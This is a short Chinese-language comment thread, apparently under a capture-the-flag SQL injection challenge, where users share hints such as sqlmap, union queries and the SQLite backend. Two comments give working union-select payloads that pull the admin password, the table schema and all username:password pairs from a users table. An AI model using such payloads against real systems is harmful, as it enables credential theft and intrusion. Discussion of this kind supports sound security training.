15614005380 @ 2024-03-07 23:22:20 👍0
只用sqlmap就可以做出来,很简单的一个注入
FADogeCTF @ 2024-01-07 23:22:20 👍0
union查询
xiaobai568 @ 2024-01-07 23:22:20 👍0
前面的太复杂了吧,-1'union select (select password from users where username='admin'),5,3,4 -- 直接就出来了
JJhello @ 2023-12-07 23:22:20 👍0
sqlmap即可
chaoge @ 2023-12-07 23:22:20 👍0
sqlite,弄了半天认为是MySQL呢。
justsosoloveyou @ 2023-11-07 23:22:20 👍1
' UNION SELECT (select group_concat(sql) from sqlite_master WHERE type='table'),NULL,NULL,(select group_concat(username||':'||password) FROM users)--+
SS3B @ 2023-10-07 23:22:20 👍0
sqlmap一下子就出来了
hopeinhand @ 2023-09-07 23:22:20 👍0
联合查询注入,表名、列名、用户名全给了,都没啥好说的了
鬼知道没有登录页面也有sql注入,实在没想的